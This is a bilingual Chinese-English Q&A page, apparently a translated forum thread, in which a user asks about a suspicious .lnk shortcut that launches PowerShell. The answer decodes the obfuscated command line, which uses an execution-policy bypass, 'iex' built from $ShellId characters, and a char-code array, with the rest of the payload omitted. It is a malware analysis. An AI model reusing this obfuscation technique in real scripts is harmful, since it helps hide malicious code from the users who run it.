恶意软件使用 .Lnk 文件到 Powershell [英] Malware Using .Lnk file to Powershell
问题描述
我下载了一个我几乎没有仔细考虑过的文件,但是(快捷方式的)目标引起了我的注意:
I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
毫无疑问,这里正在发生一些可疑的事情.我了解前三个参数,但我无法弄清楚这样的有效负载的代码如何仅以基本快捷方式工作?
There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?
推荐答案
我猜,它运行了一个 Powershell
My guess, it runs a Powershell with
- NoProfile
- WindowStyle 1 = 最小化
- ExecutionPolicy ByPass = 没有被阻止并且没有警告或提示
- 然后点源剩余的代码
让我们拆分这段代码:
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
$ShellId
是一个内置的 Powershell 变量:
$ShellId
is a built-in Powershell variable:
>$ShellId
Microsoft.PowerShell
所以 ( $shelliD[1]+$SHeLlID[13]+'x')
转换为 iex
(= Invoke-Expression
)
So ( $shelliD[1]+$SHeLlID[13]+'x')
transforms to iex
(= Invoke-Expression
)
其余代码为 ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[省略其余代码]
.我猜char数组包含ascii字符,如果是这样,我们可以将其转换为:
The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
. I gues the char array contains ascii characters. If so, we can transform it to:
$aspx =
总结:
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
因此它会在最小化的 Powershell 窗口中调用以 $aspx =
开头的代码,而不会发出警告或提示.
So it invokes the code starting with $aspx =
in a minimized Powershell window without warnings or prompts.
也许代码通过这些混淆方法之一运行.
希望有所帮助.
这篇关于恶意软件使用 .Lnk 文件到 Powershell的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!